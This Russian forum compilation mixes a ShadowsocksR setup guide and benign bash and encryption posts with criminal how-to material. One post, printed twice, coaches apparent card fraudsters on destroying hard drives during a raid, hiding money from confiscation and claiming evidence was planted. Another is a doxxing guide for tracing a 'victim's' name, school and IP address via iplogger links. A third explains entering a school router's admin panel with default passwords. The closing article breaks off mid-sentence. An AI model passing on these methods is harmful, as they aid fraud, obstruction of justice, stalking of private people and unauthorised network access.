Поздравляем, установка сервера ShadowsocksR завершена! IP вашего сервера: 0.0.0.0 Порт вашего сервера: 8989 Ваш пароль: пароль Ваш метод шифрования: aes-256-cfb Протокол: происхождение obfs: обычный Шаг 3. Редактировать конфиг vi / etc / shadowsocks- r / config .json Нажмите «i», чтобы отредактировать файл. Переместите курсор, чтобы изменить текст. Изменить "protocol": "origin",на "protocol": "auth_sha1_v4",и "obfs": "plain",на"obfs": "tls1.2_ticket_auth", Нажмите «esc», затем введите «: wq!», Чтобы сохранить файл и вернуться назад. Перезапустите shadowsocksr с помощью /etc/init.d/shadowsocks-r restart Шаг 4. Скачать клиент ShadowsocksR для Windows ShadowsocksR для Android ShadowsocksR для Mac iOS Potatso Lite (БЕСПЛАТНО) iOS Shadowrocket ($ 2,99) Запустите его, введите свой IP, порт, пароль и измените протокол и obfs. Готово Шаг 5. Защитите свой доступ по SSH от атак грубой силы Самый простой способ сделать это - использовать iptables iptables -I INPUT -p tcp –dport 22 -i eth0 -m состояние –состояния NEW -m последние –set iptables -I INPUT -p tcp –dport 22 -i eth0 -m состояние –состояния NEW -m последние –обновление –секунды 60 –hitcount 4 -j DROP Это заблокирует IP-адреса, которые пытаются войти более 3 раз в минуту. Он влияет только на «НОВЫЕ» соединения, поэтому правильно аутентифицированные сеансы ssh не будут заблокированы. Другие слухи Shadowsocks в настоящее время запрещены? Вот что сообщает пользователь из Китая: Правительство, похоже, пытается перехватывать, но, видимо, все еще нужно много работать. Они пытались обнаружить эти скрытые сервисы с помощью социальной инженерии, обнаружения и анализа трафика и проактивного обнаружения портов. Тем не менее, некоторые поставщики услуг Shadowsocks также пытаются противостоять этим запретам. Протокол Shadowsocks все еще поддерживается, и в протоколе отсутствует ясное волшебное слово связи, которое нужно обнаружить. Дин Юйфэн Это руководство похоже на настройку, указанную в статье выше, но имеет несколько отличий: https://www.tipsforchina.com/how-to-setup-a-fast-shadowsocks-server-on-vultr-vps-the-easy-way.html Имейте в виду, BBR не работает с OpenVZ. Это работает для KVM, я считаю. Vultr должен быть в порядке, так как руководство также использует Vultr. Дайте мне знать, если этого руководства недостаточно. Для KCP, если вы знакомы с SS / SSR, то это в основном то же самое. https://github.com/xtaci/kcptun По сути, вместо прямого SS (клиент) к SS (сервер), вы идете SS (client) -> Kcp (client) -> Kcp (server) -> SS (server). Страница git имеет достаточно основ. Если у вас есть проблемы с этим, вам может потребоваться некоторое время, чтобы ознакомиться с командной строкой linux / vi или редактором vim.
  7. Используя эти советы, Вы сможете уменьшить в разы риск оказаться за решеткой. К сожалению аресты забрали у нас выдающихся деятелей, некоторым сломали судьбу, поэтому никогда не нужно забывать о том, что всё может поменяться в один миг. На моей памяти люди, которые думали, что их связи в органах им помогут в случае ареста, однако никогда и никто ещё никому не помог. На памяти случаи, когда люди, быстро зарабатывая большие деньги теряли самообладание, и им казалось, что вот уже всё, вот он успех, я держу Бога за бороду и яйца одновременно, я куплю любой суд, а тем более следствие, да они мне будут ещё массаж делать, но на деле всё оказывалось абсолютно не так. Некоторые попадали туда из-за банальной привычки напиваться до чертиков, а потом расчитывать кредитной картой. В 2000 очень модно было собрать друзей со двора и пройтись по модным магазинам, прикупив трусы, кепку, пару носков и гель для душа. Большинство людей попадаются из-за мелочей и обычной глупости. Мелочей в нашем деле не бывает. Вы должны быть в безопасности, даже не для себя, а для Ваших близких, которым Вы принесёте большое горе в случае, если с Вами случится это. 1. Ни для кого не секрет, что ICQ сегодня принадлежит Mailru Group ( в народе FSB Group), ICQ записывает все ваши сообщения, которые потом анализируют аналитики различных спецслужб, пытаясь найти зацепки, с помощью которых можно выйти на Вас. Вы используете 2 VPN, три сокса, это очень хорошо и правильно, но во-первых: a) всегда думайте у кого вы покупаете ВПН, насколько порядочен этот человек. В 2004 году в октябре в США прошла спецоперация Firewall, в ходе которой было арестовано 28 человек, в основном граждан США, они были нормальными людьми, надежными партнерами, использовали ВПН сервис, не болтали лишнего, но они не могли подумать, что администратор форума с ником «Cumbajohnny», который был завербован ФБР, специально создал этот VPN сервис для поимки юзеров форума, которые использовали соксы и прокси, и логи форума не давали возможности их найти. Не хочу и тень сомнения кинуть на продавцов VPN, но необходимо просчитывать все варианты. Совет – покупать свой сервер и ставить там ВПН, либо пользоваться сервисами очень проверенных людей. б) Вести свою переписку так, как буд-то её читают федеральные агенты, то есть, не писать места, где вы бываете и живете, куда едете отдыхать, не поздравлять друг друга с днём рождения, не писать есть ли у вас кот или собака, и сколько лет вашей маме, ни в коем случае не писать номера телефонов и домашний адрес, помните, всё это может оказаться в руках федералов, и всё это будет зацепкой к Вашему аресту. Вы скажите, что у вас личный джабер сервер? Но могут арестовать вашего коллегу, открыть его машину, и там найти всю переписку. Например в штатах логи по ICQ считаются доказательством, и прокурору не составит труда доказать присяжным, что переписка найденная на Вашем компьютере принадлежит именно Вам. в) использовать отдельный интернет, благо сейчас это возможно, чтобы, если Вы случайно зашли в ICQ, форум, Jabber с своего айпишника, а такое бывает у 90% людей, Вы могли выбросить модем, и купить новый, а не сидеть и думать, что же будет, а может никто не заметил. 3. В месте, откуда Вы заходите в Интернет и работаете, всё должно быть именно так, как-будто через 2 часа у Вас будет обыск, особенно это касается имеющих дело с реалом. То есть, у вас не должны валяться кредитные карты под матрацом, я думаю у некоторых дома имеются CD, где записаны какие-то файлы, сканы паспортов, информация о кредитных картах, которую когда-то зачем-то записали, и забыли. Левых паспортов, печатей, документов, не должно быть также на Вашем рабочем месте. Так как даже, если не смогут открыть Ваш компьютер, то всего найденного хватит, чтобы доказать Вашу вину. Если у Вас имеются суммы налички, рекомендую иметь дома секретный сейф. 4. У вас не должно быть крупных сумм денег на вашем рабочем месте. Если всё таки такие суммы появляются в Вашей квартире, у вас должен быть секретный сейф, о котором не знают близкие друзья и родственники. Иначе, в случае обыска, и занесения этих средств в протокол, Вам будет сложнее объяснить откуда, у не работающего студента оказалось 200 000 долларов. Как лучшего всего хранить деньги. Рекомендую деньги хранить у кровных родственников ( мама, папа). Так как обыск может пройти и у них, им рекомендуется класть деньги в ячейки, причём документы о наличии ячейки, должны также оставаться в этой же ячейки. Помните, что Ваша супруга или супруг, являются 50% владельцами всего Вашего имущество нажитого после регистрации Вашего брака. Следовательно, в случае, если Вы оформили свою квартиру на жену, и Вас осудили с конфискацией, то государство продаст эту квартиру и 50% суммы вернет жене, только эта сумма будет очень маленькой и не рыночной. Поэтому советую оформлять всю недвижимость на Ваших родственников ( не путать с родственниками жены). 5. Если Вы решили поехать отдохнуть за границу, не следует об этом писать всем своим коллегам, так как Ваш uin или джабер может мониторится, и к Вашему приезду Вас будут ждать. Не рекомендуется брать с собой ноутбук, всех денег не заработать, а во-вторых именно этот ноутбук сможет оказаться доказательством против Вас. Если Вы всё таки едете отдыхать, помните, что практически любая страна выдаст Вас США, особенно такие страны, как Тайланд, Франция, Германия, другие страны Европы, имеющие договоры об экстрадиции. Лучше отдыхать в странах, у которых нет с США дипломатических отношения, либо эти отношения не хорошие ( Иран, Венесуэла, Куба, Боливия, Белоруссия, Китай итд). Но, именно так думал один парень из Эстонии, который полетел отдыхать прямым рейсом в одну из стран, с которой у США плохие отношения, но его самолёт развернули и попросили приземлиться в аэропорту Германии, где его и арестовали и экстрадировали. Поэтому, все Ваши поездки на Ваш страх и риск. 6. Если Вас арестовали не стоит устраивать панику, вы знали на что Вы идёте, и осознавали последствия. Во-первых никогда не признавайте свою вину, даже, если против Вас открытый ноутбук с всеми доказатательствами, грамотный адвокат сможет доказать, что при обыске не был переписан номер вашего жесткого диска, либо, что всё это Вам закачал кто-то через интернет, затроянив вашу машину, и так далее. Признавать вину последнее дело. Если Вы признаете вину, то дальше, дабы смягчить Вам наказание, Вам предложат сдать подельников – жить предателем и стукачом для нормального человека не нормально. У Вас должен быть на примете адвокат, к которому Вы сможете обратится. Хороших адвокатов мало, примерно 1-2 на сотню, поэтому постарайтесь подобрать такого адвоката заранее. И конечно же не тратьте все деньги, так как в черный день они вам могут очень понадобится. Легче всего сидеть и думать, что это коснётся кого угодно, но не меня, но те, кто думает именно так, остаются неподготовленными, и очень сожалеют о том, что не думали заранее. 7. Ваш диск обязательно должен быть закриптован. По моей информации Бесткрипт открыть не могут, по крайней мере, в своей практике не встречал, ФБР иногда может открыть ПГП, видимо зависит от версий программы, с Бесткрипт даже у них вроде бы не получается. Лучше всего поставить Бесткрипт, а внутри его ПГП, а ещё лучше всего купить оборудование, которое уничтожит Ваш диск током при нажатии на брелок с расстояния 50 метров, такое сегодня можно свободно купить в рунете, тогда и расшифровывать будет нечего. Если к Вам ломятся в дверь, не открывайте, достаньте жесткий диск и разбейте его топором на мелкие части и слейте их в унитаз. На суде никого не будет интересовать, почему вы не открывали дверь, как говорится не после драки кулаками не машут. 8. согласно конституции любой страны вы имеете право не давать показаний против себя, и своих родственников, воспользуйтесь этим правом, не давайте никаких объяснений и прочего до прихода адвоката. никогда не соглашайтесь на «хорошего» адвоката от следователя, который просто по дружбе хочет вам помочь и дать надежного адвоката. Не подписывайте протокол обыска, иначе вы подтверждаете, что все найденное принадлежит вам и было найдено в вашей квартире, без вашей подписи вы сможете настаивать, что таких вещей в вашей квартире не было. ещё лучше написать об этом в протоколе «этого и этого, в моей квартире никогда не было и подброшено мне сотрудниками милиции» 9. В каждой камере в тюрьме есть стукач, даже если эта камера на 2 человек, и вы один из них, значит второй 100% стукач. Стукачи работают на тюремную администрацию, за что получают возможность условно-досрочного освобождения, и различные другие блага. поэтому не забывайте об этом, если вы оказались в камере. были случаи, когда сосед по камере давал показания в суде, в качестве свидетеля, и рассказывал о том, что слышал в камере. стукачи бывают двух видов тупые и поумнее, тупые напрямую начинают интересоваться деталями вашего дела, те, кто поумнее рассказывают похожие ситуации из своей жизни, рассказывают, как их арестовывали, и вы автоматом хотите им рассказать о ваших деталях по делу. они работают по системе «раскройся сам – и узнаешь всё, что тебя интересует», то есть раскрываясь сами, они получают ваше доверие, и вы автоматом хотите с ними поделится своей историей. Конечно, с одной публикацией тяжело передать всё, но надеюсь эти простые и полезные советы помогут вам в жизни. Удачи вам, любви, и терпения! И чтобы на все свои треки, вы угадывали пин с 1 попытки. берегите себя! Используя эти советы, Вы сможете уменьшить в разы риск оказаться за решеткой. К сожалению аресты забрали у нас выдающихся деятелей, некоторым сломали судьбу, поэтому никогда не нужно забывать о том, что всё может поменяться в один миг. На моей памяти люди, которые думали, что их связи в органах им помогут в случае ареста, однако никогда и никто ещё никому не помог. На памяти случаи, когда люди, быстро зарабатывая большие деньги теряли самообладание, и им казалось, что вот уже всё, вот он успех, я держу Бога за бороду и яйца одновременно, я куплю любой суд, а тем более следствие, да они мне будут ещё массаж делать, но на деле всё оказывалось абсолютно не так. Некоторые попадали туда из-за банальной привычки напиваться до чертиков, а потом расчитывать кредитной картой. В 2000 очень модно было собрать друзей со двора и пройтись по модным магазинам, прикупив трусы, кепку, пару носков и гель для душа. Большинство людей попадаются из-за мелочей и обычной глупости. Мелочей в нашем деле не бывает. Вы должны быть в безопасности, даже не для себя, а для Ваших близких, которым Вы принесёте большое горе в случае, если с Вами случится это. 1. Ни для кого не секрет, что ICQ сегодня принадлежит Mailru Group ( в народе FSB Group), ICQ записывает все ваши сообщения, которые потом анализируют аналитики различных спецслужб, пытаясь найти зацепки, с помощью которых можно выйти на Вас. Вы используете 2 VPN, три сокса, это очень хорошо и правильно, но во-первых: a) всегда думайте у кого вы покупаете ВПН, насколько порядочен этот человек. В 2004 году в октябре в США прошла спецоперация Firewall, в ходе которой было арестовано 28 человек, в основном граждан США, они были нормальными людьми, надежными партнерами, использовали ВПН сервис, не болтали лишнего, но они не могли подумать, что администратор форума с ником «Cumbajohnny», который был завербован ФБР, специально создал этот VPN сервис для поимки юзеров форума, которые использовали соксы и прокси, и логи форума не давали возможности их найти. Не хочу и тень сомнения кинуть на продавцов VPN, но необходимо просчитывать все варианты. Совет – покупать свой сервер и ставить там ВПН, либо пользоваться сервисами очень проверенных людей. б) Вести свою переписку так, как буд-то её читают федеральные агенты, то есть, не писать места, где вы бываете и живете, куда едете отдыхать, не поздравлять друг друга с днём рождения, не писать есть ли у вас кот или собака, и сколько лет вашей маме, ни в коем случае не писать номера телефонов и домашний адрес, помните, всё это может оказаться в руках федералов, и всё это будет зацепкой к Вашему аресту. Вы скажите, что у вас личный джабер сервер? Но могут арестовать вашего коллегу, открыть его машину, и там найти всю переписку. Например в штатах логи по ICQ считаются доказательством, и прокурору не составит труда доказать присяжным, что переписка найденная на Вашем компьютере принадлежит именно Вам. в) использовать отдельный интернет, благо сейчас это возможно, чтобы, если Вы случайно зашли в ICQ, форум, Jabber с своего айпишника, а такое бывает у 90% людей, Вы могли выбросить модем, и купить новый, а не сидеть и думать, что же будет, а может никто не заметил. 3. В месте, откуда Вы заходите в Интернет и работаете, всё должно быть именно так, как-будто через 2 часа у Вас будет обыск, особенно это касается имеющих дело с реалом. То есть, у вас не должны валяться кредитные карты под матрацом, я думаю у некоторых дома имеются CD, где записаны какие-то файлы, сканы паспортов, информация о кредитных картах, которую когда-то зачем-то записали, и забыли. Левых паспортов, печатей, документов, не должно быть также на Вашем рабочем месте. Так как даже, если не смогут открыть Ваш компьютер, то всего найденного хватит, чтобы доказать Вашу вину. Если у Вас имеются суммы налички, рекомендую иметь дома секретный сейф. 4. У вас не должно быть крупных сумм денег на вашем рабочем месте. Если всё таки такие суммы появляются в Вашей квартире, у вас должен быть секретный сейф, о котором не знают близкие друзья и родственники. Иначе, в случае обыска, и занесения этих средств в протокол, Вам будет сложнее объяснить откуда, у не работающего студента оказалось 200 000 долларов. Как лучшего всего хранить деньги. Рекомендую деньги хранить у кровных родственников ( мама, папа). Так как обыск может пройти и у них, им рекомендуется класть деньги в ячейки, причём документы о наличии ячейки, должны также оставаться в этой же ячейки. Помните, что Ваша супруга или супруг, являются 50% владельцами всего Вашего имущество нажитого после регистрации Вашего брака. Следовательно, в случае, если Вы оформили свою квартиру на жену, и Вас осудили с конфискацией, то государство продаст эту квартиру и 50% суммы вернет жене, только эта сумма будет очень маленькой и не рыночной. Поэтому советую оформлять всю недвижимость на Ваших родственников ( не путать с родственниками жены). 5. Если Вы решили поехать отдохнуть за границу, не следует об этом писать всем своим коллегам, так как Ваш uin или джабер может мониторится, и к Вашему приезду Вас будут ждать. Не рекомендуется брать с собой ноутбук, всех денег не заработать, а во-вторых именно этот ноутбук сможет оказаться доказательством против Вас. Если Вы всё таки едете отдыхать, помните, что практически любая страна выдаст Вас США, особенно такие страны, как Тайланд, Франция, Германия, другие страны Европы, имеющие договоры об экстрадиции. Лучше отдыхать в странах, у которых нет с США дипломатических отношения, либо эти отношения не хорошие ( Иран, Венесуэла, Куба, Боливия, Белоруссия, Китай итд). Но, именно так думал один парень из Эстонии, который полетел отдыхать прямым рейсом в одну из стран, с которой у США плохие отношения, но его самолёт развернули и попросили приземлиться в аэропорту Германии, где его и арестовали и экстрадировали. Поэтому, все Ваши поездки на Ваш страх и риск. 6. Если Вас арестовали не стоит устраивать панику, вы знали на что Вы идёте, и осознавали последствия. Во-первых никогда не признавайте свою вину, даже, если против Вас открытый ноутбук с всеми доказатательствами, грамотный адвокат сможет доказать, что при обыске не был переписан номер вашего жесткого диска, либо, что всё это Вам закачал кто-то через интернет, затроянив вашу машину, и так далее. Признавать вину последнее дело. Если Вы признаете вину, то дальше, дабы смягчить Вам наказание, Вам предложат сдать подельников – жить предателем и стукачом для нормального человека не нормально. У Вас должен быть на примете адвокат, к которому Вы сможете обратится. Хороших адвокатов мало, примерно 1-2 на сотню, поэтому постарайтесь подобрать такого адвоката заранее. И конечно же не тратьте все деньги, так как в черный день они вам могут очень понадобится. Легче всего сидеть и думать, что это коснётся кого угодно, но не меня, но те, кто думает именно так, остаются неподготовленными, и очень сожалеют о том, что не думали заранее. 7. Ваш диск обязательно должен быть закриптован. По моей информации Бесткрипт открыть не могут, по крайней мере, в своей практике не встречал, ФБР иногда может открыть ПГП, видимо зависит от версий программы, с Бесткрипт даже у них вроде бы не получается. Лучше всего поставить Бесткрипт, а внутри его ПГП, а ещё лучше всего купить оборудование, которое уничтожит Ваш диск током при нажатии на брелок с расстояния 50 метров, такое сегодня можно свободно купить в рунете, тогда и расшифровывать будет нечего. Если к Вам ломятся в дверь, не открывайте, достаньте жесткий диск и разбейте его топором на мелкие части и слейте их в унитаз. На суде никого не будет интересовать, почему вы не открывали дверь, как говорится не после драки кулаками не машут. 8. согласно конституции любой страны вы имеете право не давать показаний против себя, и своих родственников, воспользуйтесь этим правом, не давайте никаких объяснений и прочего до прихода адвоката. никогда не соглашайтесь на «хорошего» адвоката от следователя, который просто по дружбе хочет вам помочь и дать надежного адвоката. Не подписывайте протокол обыска, иначе вы подтверждаете, что все найденное принадлежит вам и было найдено в вашей квартире, без вашей подписи вы сможете настаивать, что таких вещей в вашей квартире не было. ещё лучше написать об этом в протоколе «этого и этого, в моей квартире никогда не было и подброшено мне сотрудниками милиции» 9. В каждой камере в тюрьме есть стукач, даже если эта камера на 2 человек, и вы один из них, значит второй 100% стукач. Стукачи работают на тюремную администрацию, за что получают возможность условно-досрочного освобождения, и различные другие блага. поэтому не забывайте об этом, если вы оказались в камере. были случаи, когда сосед по камере давал показания в суде, в качестве свидетеля, и рассказывал о том, что слышал в камере. стукачи бывают двух видов тупые и поумнее, тупые напрямую начинают интересоваться деталями вашего дела, те, кто поумнее рассказывают похожие ситуации из своей жизни, рассказывают, как их арестовывали, и вы автоматом хотите им рассказать о ваших деталях по делу. они работают по системе «раскройся сам – и узнаешь всё, что тебя интересует», то есть раскрываясь сами, они получают ваше доверие, и вы автоматом хотите с ними поделится своей историей. Конечно, с одной публикацией тяжело передать всё, но надеюсь эти простые и полезные советы помогут вам в жизни. Удачи вам, любви, и терпения! И чтобы на все свои треки, вы угадывали пин с 1 попытки. берегите себя!
  8. 1-Анонимизация(by Cokas) 1.1) поменять свой айди на буквенный (не меняйте айди на свой ник а то по способу intext можно узнать лишнее) 1.2) используй VPN 1.3) купи стр которые по 1-5р 1.4) купи левый номер для киви (если нету возможностей для покупки левого киви то используй д/a-DonationAlerts 1.5) не пиши лишней информации о себе 1.6) никому не говорю сколько тебе лет и т.д 1.7) не попоадйся на кукузлу)) 1.8) не добовляй в др своих друзей из города,одноклассников,и кого то из семьи 1.9) удали все свои старые стр 2)Деанонимизация(By Cokas) 2.1) Способ нахождения по id Чтобы узнать не мало информации с помощью id вам нужно скопировать его ссылку вк и ***** ссылку в этот сайт showid.ru,с помощью этого сайта мы узнаём id жертвы и ****аем в гугл или яндекс.После этого мы узнаём его канал,инстаграм если есть и дополнительную информацию.Если вы вбили id жертвы то не нашли нечего т.е там нечего не написано то делаем следующее,например ссылка вк vk.com/klerongrief копируем всё что написано после знака / у нас это будет выгдядить вот так klerongrief и ****аем это дело в гугл и яндекс.После видем что там много информации. 2.2) Способ нахождения по intext Как и в первом пункте я говорил ссылка вк жертвы vk.com/klerongrief выделяем всё после / у нас получается klerongrief.Теперь заходим в гугл пишем intext:klerongiref т.е после слова intext: ****аем его ник. 2.3) Способ нахождения ФИО т.е имя и фамку копируем айди вводом в гугл и там мы видим профили вконтакте и его айди но другим именем значит тот имя фейк а в профилях где написано в гугле верно 2.4) Способ нахождения фио с помощью номера Всё просто,узнаём номер жертвы заходим в ok.ru нажимаем на забыли пароль номер телефона и ****аем номер туда.Там выйдет какое то имя если будет женское то номер жертвы это номер его мамы. 2.5) Способ нахождения школы В этом способе необходим номер телефона.Если мы узнали номер телефона жертв то заходим на сайт phoneradar.ru и ****аем его номер и узнаем его номер оператора и город.После того как мы узнали город заходим с пк или с телефона на версии пк в друзья жертвы и в категориях выбераем его город,там могут быть его одноклассники или кто то из его семьи. 2.6)Способ нахождения школы с помощью id если нет номера вбиваем айди находим его группы,в группе может быть указан город и мы потом заходим в категории и выбираем его город. 3)Имена для деанонеров: 1) Огнеслав 2) Юстилиан 3) Илларион 4) Константин,Владлен 5) Герман 6) Генрих 7) Феодосий 8) Патриарх 9) Иннокентий 10) Януарий 11) Виктор 12) Мирослав 13) Ярослав 14) Мстислав 15) Дмитрий 16) Кирилл 17) Альберт 18) Роберт 19) Ростислав 20) Григорий 21) Август 22) Алексей 23) Арсений 24) Всеволд 25) Евгений 26) Кирилл 27) Владимир 28) Эдуард 29) Эдвард 30) Андрей 4)Фамилии деванонеров: 1. Ландышев 2. Добронравов 3. Демидов 4. Король 5. Райский 6. Вольтман 7. Циммерман 8. Разумный 9. Верховный 10. Ошибкин 11. Державин 12. Бесфамильный 13. Бездушный 14. Затопольский 15. Приморский 16. Леонов 17. Бессмертный 18. Новиков 19. Миллер 20. Массон 21. Азимов 22. Громов 23. Листопадов 24. Добровольский 25. Крестовский 26. Долларов 27. Преображенский 28. Мирный 29. Отченаш, 30. Константинопольский 31. Рубчинский 32. Вишня 5)Сайты для деанона(by Cokas) 1) 220vk.com - узнаём скрытых друзей в вк 2) showid.ru - узнаём айди жертвы 3) phoneradar.ru - узнаём с какого города жертва с помощью его номера 4) iplogger.ru - сайт где сокращаем ссылку и кидаем жертве далее узнаём город и айпи 5) skyperesolver.net - при общении в скайпе узнаём айпи 6)Заключение: Вот и настал конец, спасибо что прочитали данный пост. Надеюсь вы узнали хоть что то с этого поста. Желаю всем удачи,счастливо!
  9. Эта темя создана для тех, кто не шарит во всех инфраструктурах и т.д. Вобщем для смены нам нужно: 1. Какая-нибудь программка для чека открытых портов вайфай сети(я использую Fing, в плеймаркете есть). 2. Подключение к школьному Wi-Fi роутеру. Приступим. 1. Открываем програмку для чека портов и ищем открытые порты. (Fing: Устройства > кнопка "обновить">тыкаем на нужный вайфай>в разделе "управление этим устройством" тыкаем кнопку "больше">"найти открытые порты".) 2. Ищем порт, который открыт для панели управления роутером.(Fing: выбираем порт(у меня порт 8080), и тыкаем "открыть сайт". 3. Когда нашли нужный сайт, разбираемся, чо там как(только не тыкайте все подряд а-то останитесь без вайфая). Если требует пароль - пробуйте эти: admin, 1234. Через этот сайт можно управлять роутером вайфая(нет, ездить вайфай роутер не умеет.)
  10. Итак, приступим! Ищем любую картинку, которая понравилась. Назовем её 1, так же создаём архив, называем, допустим, 2. (здесь по ошибке назвал картинку 2, это не смертельно, далее переименовал в 1) Что мы имеем? 1.jpg - наша картинка или фотка в которую мы будем прятать архив. (обязательно нужен формат .jpg) 2.rar - наш архив который мы засунем в нашу картинку. Далее открываем блокнот и пишем туда код: copy /b 1.JPG + 2.rar 777.jpg Сохраняем как 1.bat, запускаем сори за качество) Поясняю: 1. JPG - это наша картинка 2. Rar - это наш архив 777.jpg - создаётся так же картинка внутри которой уже будет архив После открываем картинку "открыть как.." архив и кидаем всю чешую, которую хотим спрятать Эту картинку можно скинуть другу, открыв её как архив он может увидеть содержимое. Спасибо, что уделил внимания)
  11. Всем привет! Сегодня я бы хотел рассказать вам о настройке визуальной и практической составляющей терминала, это упростит и ускорит работу за ним. 1. shopt (set) shopt в bash, это команда которая позволяет активировать некоторые опции оболочки bash. Их довольно много и я рассмотрю только основные. autocd Включение : shopt -s autocd Позволяет просто писать путь в который вы хотите перейти. Пример: $/home/detectent bash : /home/detectent/ : Is a directory $shopt -s autocd $/home/detectent && pwd /home cdspell Исправляет незначительные ошибки в пути в команде cd Пример: $cd /home/hakcertosh bash : cd : /home/hakcertosh : No such file or directory $shopt -s cdspell $cd /home/hakcertosh && pwd /home/hackertosh Не работает в связке с autocd! 2. alias alias позволяет вам задавать псевдоним для какой-либо команды. Пример: $alias la='ls -a' $la . .. .README 3. bashrc bashrc является скриптом bash которые выполняется при запуске оболочки. Он может изпользоваться для автоматичиского вывода приветствия, выставления alias'ов, shopt'ов и переменных оболочки. Этот файл рапологается в ~/.bashrc у вас его может и не быть тогда его придётся создать. При желании, я могу написать более подробную статью о нем. 4. PS1, PS2 и PROMPT_COMMAND Это переменные оболочки. В PS1 содержится текст, который будет выводиться перед вводом команды. В PS2 текст который будет выводиться при много строчной команде. В PROMPT_COMMAND лежит команда которая будет выполнятся перед выводом PS1. Также если вы работали на Parrot OS или видели скриншоты, то мы могли заметить интересный терминал, это реализовано с помощью PS1. 5. Темы Почти все современные терминалы поддерживают цветовые темы, обычно они изменяются в настройках в докбаре сверху.Для пользователей Термукса есть аддон Termux:Styling. В Play Market он платный, в репозиториях FDroid он бесплатный, но у меня были проблемы с загрузкой, так что я оставлю .apk файл в архиве. После загрузки вам нужно выбрать любой текст, нажать More и выбрать Style Выше, в примере bashrc уже был показан Termux с доп. темами
  12. Перед службами ИТ и ИБ всё чаще ставят задачу повысить уровень защищённости данных на рабочих местах. И, естественно, в основном уровень приватности увеличивают с помощью криптографии. Но если перемудрить в этом вопросе и не продумать механизм хранения паролей, на практике шифрование может оказаться бесполезным, а то и наоборот — переплюнуть все внешние угрозы, надёжно спрятав файлы от самого пользователя. По данным Acronis, количество атак программ вымогателей-шифровальщиков (Ransomware) в прошлом году выросло до 200 миллионов, а Cybersecurity Ventures предсказывает, что к 2021 году бизнес будет подвергаться атакам каждые каждые 11 секунд. Но само по себе повсеместное шифрование не даёт ожидаемых результатов. Просто зашифровав что-то, мы не гарантируем увеличения защищённости. Напротив, распространение программ вымогателей-шифровальщиков (Ransomware) говорит о том, что шифрование может обернуться очень неприятной стороной. Ведь в сущности, чем отличается атака шифровальщика от потерянного пароля криптосервиса? Чтобы от шифрования был толк, необходимо чётко понимать, какие ресурсы нужно защищать криптографически и как именно организовать работу со средствами шифрования. Что шифровать? Как шифровать? Это первый вопрос, который нужно задать себе при внедрении шифрования. На практике криптография легко применяется только на уровне готовых продуктов и решений. Например, при облачном резервном копировании мы шифруем данные на компьютере пользователя, а информацию передаём по зашифрованному каналу. Но для того чтобы гарантировать защиту данных в процессе работы с ними, необходимо настроить шифрование отдельных категорий информации. Файлы и папки — сквозное шифрование Защиту файлов и папок можно обеспечить за счёт сквозного шифрования. Для этого существуют специальные утилиты, которые обеспечивают непрерывное шифрование выбранных объектов. Таких решений сегодня достаточно много. Например, можно воспользоваться популярной утилитой Boxcrypt, которая шифрует любые объекты, независимо от их местоположения. Зашифровать можно даже файлы, находящиеся на облачных дисках (Google Drive, OneDrive и т. д.). При таком подходе никто не сможет прочитать содержимое файлов, если на компьютере не запущено соответствующее приложение, а в нём — не введён секретный ключ. Соответственно от копирования или кражи файлов не будет никакого толку, потому что злоумышленник просто не сможет открыть их без вашего пароля. Зашифрованный диск Для тех, кто работает с большими массивами данных, которые необходимо защищать от посторонних глаз, подходит технология шифрования целого диска. Для этого можно использовать такие программы, как PGPDisk, либо настроить шифрование на уровне операционной системы. Например, если раздел отформатирован в EFS, операционная система Windows позволяет зашифровать содержимое диска даже без сторонних утилит. Шифрование на уровне виртуальной машины Для тех случаев, когда возникает необходимость обеспечить максимальную защиту документов, лучше всего работать с ними через виртуальную машину с зашифрованным диском. Например, бухгалтерам, работающим с 1C или другой программой со служебной информацией, лучше всего подойдёт изолированная среда. С другой стороны, сотруднику нужен доступ к интернету, чтобы проверять почту, сверяться с текстами законов, общаться с коллегами и т. п. В таком случае можно создать ВМ без доступа к интернету и получить полностью закрытое пространство для конфиденциальных данных. Плюс такого подхода заключается в том, что диск виртуальной машины выглядит извне как один зашифрованный файл, поэтому данные будут надёжно защищены от различного вредоносного ПО и посторонних глаз. Электронная почта и переписка Учитывая, что мы постоянно пересылаем друг другу документацию, практически у всех пользователей в электронной почте можно найти самую разную информацию — от персональных данных и сканов документов до проектов будущих договоров. В почтовом архиве, который годами хранится на компьютере или на сервере, может находиться не один важный документ. Так что даже для домашнего пользователя взлом почтового архива и кража данных может привести к внезапному оформлению кредита в микрофинансовой организации, о котором вы и не подозревали. Выгружать с почтовых серверов архивы достаточно хлопотно. Поэтому гораздо популярнее оказываются утилиты, шифрующие отдельные папки на почтовых сервисах. Самый простой способ — включить шифрование архивных сообщений и настроить архивацию, скажем, через две недели или через месяц. Конечно, облачные сервисы email применяют шифрование для защиты данных, но, увы, почтовые ящики обычно взламываются за счёт кражи или подбора пароля. Поэтому для шифрования отдельных папок лучше использовать отдельные утилиты со своими ключами и паролями. Если основной почтовый клиент — локальный (то есть письма загружаются с сервера и хранятся на компьютере), можно использовать инструменты для локального шифрования писем. А в случае если письма загружаются по протоколу IMAP, вполне можно автоматически организовать шифрование и повторную загрузку писем на сервер. Однако мало кто из пользователей сможет сделать это самостоятельно, и администраторам потребуется настраивать и поддерживать эту экосистему своими силами. При этом очевидно, что облачные провайдеры не дают никакой приватности. Все они «читают» переписку в автоматическом режиме, радуя нас обилием релевантной контекстной рекламы. И если вы не хотите, чтобы кто-то «подглядывал» за вашей перепиской, можно вести обмен сообщениями в уже зашифрованном виде. Для такого уровня приватности подходят программы типа PGPmail. Но не стоит злоупотребять этой практикой, так как она способна вызывать повышенное внимание со стороны контролирующих органов. К тому же поставщики бесплатных email-сервисов могут отказать в обслуживании тем, кто шифрует свою переписку. Так что, возможно, вместе с утилитой для шифрования потребуется и платный почтовый сервис. Платежи и транзакции С точки зрения злоумышленников, самая интересная и ценная информация — это данные ваших банковских карт, реквизиты доступа в интернет-банк и коды подтверждения оплаты. Чтобы избежать досадных инцидентов с финансовыми активами, лучше всего использовать такой простой метод защиты, как виртуальная карта для платежей в сети. Однако и на компьютере можно создать защищённые условия для проведения платежей. Для этого достаточно запустить виртуальную машину (на этот раз уже с доступом в интернет) с зашифрованным диском и без лишнего ПО, чтобы минимизировать риски компрометации вашей финансовой информации. Стоит помнить, что проблема изоляции приложений на мобильных устройствах под Android пока ещё не имеет универсального системного решения. То есть банковские мобильные приложения работают практически в одной и той же среде со всеми другими утилитами. Поэтому использование двухфакторной аутентификации не даёт гарантий безопасности. Ведь если устройство было поражено вирусом или украдено злоумышленником, он сможет получить доступ и в интернет-банк и ввести проверочный код из 